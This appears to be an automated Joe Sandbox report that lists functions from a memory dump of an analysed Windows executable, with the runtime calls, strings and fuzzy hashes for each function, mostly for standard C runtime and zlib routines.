UnhandledExceptionFilter.KERNEL32 ref: 00007FF6399C9A3E

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
Instruction ID: 6c89e3529143237bf87c122650a5b115976cedba898c3b9db555cf104b33408d
Opcode Fuzzy Hash: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
Instruction Fuzzy Hash: AF314236618F8286DB60CF25E8802AE73A5FB89754F580135EA9D87B9ADF3CD545CF00

Function 00007FF6399D0B84 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6399D0BD0
FindFirstFileExW.KERNEL32 ref: 00007FF6399D0CDA

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: fe4d16d24a501c342f9bdefd2dbf7b3c8df5536519bece05b709b84cd6c1ed58
Instruction ID: 3225b58b04e989c1bd281be9aeffe71f8d7845a520adcc52ca967e6e991e113f
Opcode Fuzzy Hash: fe4d16d24a501c342f9bdefd2dbf7b3c8df5536519bece05b709b84cd6c1ed58
Instruction Fuzzy Hash: B3B1C722B1869281EA60DF25D8802B96392EF54BE4F5D5132ED5D87BDEDF3CE441EB00

Function 00007FF6399D518C Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF6399D51BA

Part of subcall function 00007FF6399D4908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6399D491C

_get_daylight.LIBCMT ref: 00007FF6399D51CB

Part of subcall function 00007FF6399D48A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6399D48BC

_get_daylight.LIBCMT ref: 00007FF6399D51DC

Part of subcall function 00007FF6399D48D8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6399D48EC

Part of subcall function 00007FF6399C9C58: RtlFreeHeap.NTDLL(?,?,?,00007FF6399D2032,?,?,?,00007FF6399D206F,?,?,00000000,00007FF6399D2535,?,?,?,00007FF6399D2467), ref: 00007FF6399C9C6E
Part of subcall function 00007FF6399C9C58: GetLastError.KERNEL32(?,?,?,00007FF6399D2032,?,?,?,00007FF6399D206F,?,?,00000000,00007FF6399D2535,?,?,?,00007FF6399D2467), ref: 00007FF6399C9C78

GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6399D541C), ref: 00007FF6399D5203

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 3458911817-0
Opcode ID: ae64d4b013316384daf219013b3406c3cfe35626df30cbdeb691f729cbc9c9de
Instruction ID: 48919e8359a416c18dea602ca0c19232ddc98d1e972730a6e63117874ca41f16
Opcode Fuzzy Hash: ae64d4b013316384daf219013b3406c3cfe35626df30cbdeb691f729cbc9c9de
Instruction Fuzzy Hash: E7514B32A0864286E720DF26A8C11B9A7A2BF48784F495135EA4DC77DFDF3CE440AB41

Function 00007FF6399BC330 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF6399BC35C
GetCurrentThreadId.KERNEL32 ref: 00007FF6399BC36A
GetCurrentProcessId.KERNEL32 ref: 00007FF6399BC376
QueryPerformanceCounter.KERNEL32 ref: 00007FF6399BC386

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
Instruction ID: dcbf818b759eaf3a0385295f69b01b73c162a66eee838043a4dd22f3f8bae4f1
Opcode Fuzzy Hash: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
Instruction Fuzzy Hash: 33117022B14F068AEB00CF60E8442B933A4FB69758F481E35DA2D877ADDF7CD5548740

Function 00007FF6399D2F20 Relevance: 4.8, APIs: 3, Instructions: 340COMMON

Download Yara Rule

APIs

memcpy_s.LIBCPMT ref: 00007FF6399D2F86
memcpy_s.LIBCPMT ref: 00007FF6399D2FB1

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: memcpy_s
String ID:
API String ID: 1502251526-0
Opcode ID: b41cb84a548d2e61bdeb7bb10330278f5fecde395d7a0ce6ff99175555b28b3c
Instruction ID: c8044ce27cd7a85dc8f74ad0ad2caff9c44d514f2bb517f6b7e2ad91a1493667
Opcode Fuzzy Hash: b41cb84a548d2e61bdeb7bb10330278f5fecde395d7a0ce6ff99175555b28b3c
Instruction Fuzzy Hash: 35C1F472B1828687D724CF19A18566EB792FF98788F488134DB4A87789DF3DE841CF40

Function 00007FF6399B979B Relevance: 4.1, Strings: 3, Instructions: 397COMMON

Download Yara Rule

Strings

header crc mismatch, xrefs: 00007FF6399B9C41
, xrefs: 00007FF6399B987B
unknown header flags set, xrefs: 00007FF6399B97E5

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID:
String ID: $header crc mismatch$unknown header flags set
API String ID: 0-1127688429
Opcode ID: 6a55f11302ef793728786adf415505d571280719f8ef56880a9f0a37636d8ec0
Instruction ID: 52a4add6bf7bad556e4b32b8c86adaedf00b22d68476ccf8df6550e065e2bb63
Opcode Fuzzy Hash: 6a55f11302ef793728786adf415505d571280719f8ef56880a9f0a37636d8ec0
Instruction Fuzzy Hash: 5EF18062A282D54BE7A58F15C098B3A3ABEEF45748F094538DA4D877DACF3CD940DB40

Function 00007FF6399D8A38 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FF6399D8C87
RaiseException.KERNEL32 ref: 00007FF6399D8C98

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: 4367feba8b0fb5a89db2d79700bffb7903d016d74ce2a4ac284103265cf95646
Instruction ID: 9d2f97b36854c9d0649cffd549559a7b1d55d1ad53d431d0920d021eaca6dec9
Opcode Fuzzy Hash: 4367feba8b0fb5a89db2d79700bffb7903d016d74ce2a4ac284103265cf95646
Instruction Fuzzy Hash: D4B14C77604B898BE715CF2AC8863683BA1FB44B48F188961DA5D837BACF39D451DB00

Function 00007FF6399C2CC4 Relevance: 2.8, Strings: 2, Instructions: 350COMMON

Download Yara Rule

Strings

, xrefs: 00007FF6399C2E32
, xrefs: 00007FF6399C3074

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: 25965de2e6678be5c8c686b25b3b835ec4bf2bfab2b797158b347abdb642f747
Instruction ID: 777a52ca9cbbcced2781eb9a6dba2651eedcc3434e77a88e62207585926665ac
Opcode Fuzzy Hash: 25965de2e6678be5c8c686b25b3b835ec4bf2bfab2b797158b347abdb642f747
Instruction Fuzzy Hash: 0CE1B732E0864682EB68CE25C95113D3362FF59B48F1C4135DA4E8B7EADF29D851EF40

Function 00007FF6399B95FB Relevance: 2.7, Strings: 2, Instructions: 218COMMON

Download Yara Rule

Strings

invalid window size, xrefs: 00007FF6399B9769
incorrect header check, xrefs: 00007FF6399B9782

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID:
String ID: incorrect header check$invalid window size
API String ID: 0-900081337
Opcode ID: 226024973a440a2a6261c5f164d8bafa30541a105b972a390c392a8354fe07a0
Instruction ID: 719d8d6c0c6241fa181ca90163f30e2b60413158bd0998842fec0f6b785d6b14
Opcode Fuzzy Hash: 226024973a440a2a6261c5f164d8bafa30541a105b972a390c392a8354fe07a0
Instruction Fuzzy Hash: 45917172A182858BF7A58E14C498A3E3AFEFB44354F194139DA4A867C9CF3DE940DF40

Function 00007FF6399CD200 Relevance: 2.6, Strings: 2, Instructions: 144COMMON

Download Yara Rule

Strings

gfff, xrefs: 00007FF6399CD38A
e+000, xrefs: 00007FF6399CD30D

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID:
String ID: e+000$gfff
API String ID: 0-3030954782
Opcode ID: 1324d18368fb7be0dec1b44ace24e6b174879433860390047f5d35653063db2a
Instruction ID: 9ac898c549b6f923e8cb4acb6f0152e29afdaabc56d9499018377908cadb9c64
Opcode Fuzzy Hash: 1324d18368fb7be0dec1b44ace24e6b174879433860390047f5d35653063db2a
Instruction Fuzzy Hash: ED513663F186C586E7248E359C01769AB92F784B94F4C9235CA988BBCACF3DD4459F00

Function 00007FF6399CFBD8 Relevance: 2.0, APIs: 1, Instructions: 461COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: CurrentFeaturePresentProcessProcessor
String ID:
API String ID: 1010374628-0
Opcode ID: a8238ebacfbb29389201daedac3868d1c225100c6328c8ae619a1fe2ce119bc6
Instruction ID: 9adbcae1e6fdafff221cbee0672d133b5ad1a099e1cdf9c360858c8737cd0c6c
Opcode Fuzzy Hash: a8238ebacfbb29389201daedac3868d1c225100c6328c8ae619a1fe2ce119bc6
Instruction Fuzzy Hash: 5302CD21F0D68281FE10AF12A8452796686AF45B91F4D4635ED6ECB3DFDE3DA841BF00

Function 00007FF6399CCD6C Relevance: 1.5, Strings: 1, Instructions: 254COMMON

Download Yara Rule

Strings

gfffffff, xrefs: 00007FF6399CD0AE

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID:
String ID: gfffffff
API String ID: 0-1523873471
Opcode ID: ee332c23296b8dd3ed29fdb42bef122adb490463d0c8b601810d73b835641fc7
Instruction ID: 07e8ed97747ea343a7303ee015b99646f121823f2c27ceffdac1b2c8f0afcdaa
Opcode Fuzzy Hash: ee332c23296b8dd3ed29fdb42bef122adb490463d0c8b601810d73b835641fc7
Instruction Fuzzy Hash: C5A13763F0878546EB21CF29A8107A97B92AB55BC4F088031DE8D877CAEE3DD901DF01

Function 00007FF6399C7AAC Relevance: 1.4, Strings: 1, Instructions: 177COMMON

Download Yara Rule

Strings

TMP, xrefs: 00007FF6399C7ACB

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: TMP
API String ID: 3215553584-3125297090
Opcode ID: 839a1a806d2b08c8b9ade1ed9786cb9cb8429efd2ac68b7f8e7a62dba0c63b20
Instruction ID: 1ca0bc5b43090fc5793e728123827b50998499fa0dbe54bdb594463ab1010968
Opcode Fuzzy Hash: 839a1a806d2b08c8b9ade1ed9786cb9cb8429efd2ac68b7f8e7a62dba0c63b20
Instruction Fuzzy Hash: D4519B51F0864741FA68AF2A5D511BA5293AF90BC5F4C8434DE0EC77DBEE3DE542AE00

Function 00007FF6399D2790 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF6399D2794

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: fe1a72d78314f5032ff6e3f3402ce84269ae1386cefa971ca0fc6f511f9bbc55
Instruction ID: 968d77bdb27a0f9f6923d5b22bcfadd662a6fa58616fed024c42b782c32002a3
Opcode Fuzzy Hash: fe1a72d78314f5032ff6e3f3402ce84269ae1386cefa971ca0fc6f511f9bbc55
Instruction Fuzzy Hash: 44B09220E07A87C2EA082F116C8622422A67F88701FA98138C40D81365DE2C20E56B01

Function 00007FF6399C28C0 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b05403af9c31de739a9311cbf741df56ce5de8bb6a66a9cc9bcf40cf40427d0b
Instruction ID: aea59d42fb3c4bb199335a7cdadd4378996647ffdda62b7d6766d854389cb3c9
Opcode Fuzzy Hash: b05403af9c31de739a9311cbf741df56ce5de8bb6a66a9cc9bcf40cf40427d0b
Instruction Fuzzy Hash: 63D19626E0864685EB78CE25895027D27A2EB45B48F1C4235CE0D8B7EEDF3DD945EF40

Function 00007FF6399B8B20 Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6de572fc7ea0867e481f021e98a3cee959a95ba6dd1d6718a656c0f39a4e480
Instruction ID: a3c255402f58055ede9a53a0b66f6107b08aa322a4d8f4440dd560bfe10e86d6
Opcode Fuzzy Hash: b6de572fc7ea0867e481f021e98a3cee959a95ba6dd1d6718a656c0f39a4e480
Instruction Fuzzy Hash: ECC1A6722142F14FD289EB29E46957A73E1F798309BD8402AEB8747BC6CE3CE415DB50

Function 00007FF6399C1F30 Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54646038064d7a6353eabae39e6447674b1691c16f4822fec46df2a19c6da082
Instruction ID: 19c8647049d010f84af7bc8775fe090cf6696fe55bc144058068bdcc1d758097
Opcode Fuzzy Hash: 54646038064d7a6353eabae39e6447674b1691c16f4822fec46df2a19c6da082
Instruction Fuzzy Hash: CEB14D7290874585EB69CF29C85413D3BA2E749B48F684136CB4E8B3EACF39D441EF15

Function 00007FF6399CD880 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5cf27518f3756e107451e616d5c43acfc5497bdc9406be32d6656a2e3ee85f8
Instruction ID: bf3ab05746187d1f6a9a2f35663ba9554fc247eece495475fcdacb935afa85bf
Opcode Fuzzy Hash: c5cf27518f3756e107451e616d5c43acfc5497bdc9406be32d6656a2e3ee85f8
Instruction Fuzzy Hash: 0C81B273E0C68186EB74CF19984036A6A92FB89794F584235DA8D87BDEDF3DE5409F00

Function 00007FF6399D5728 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
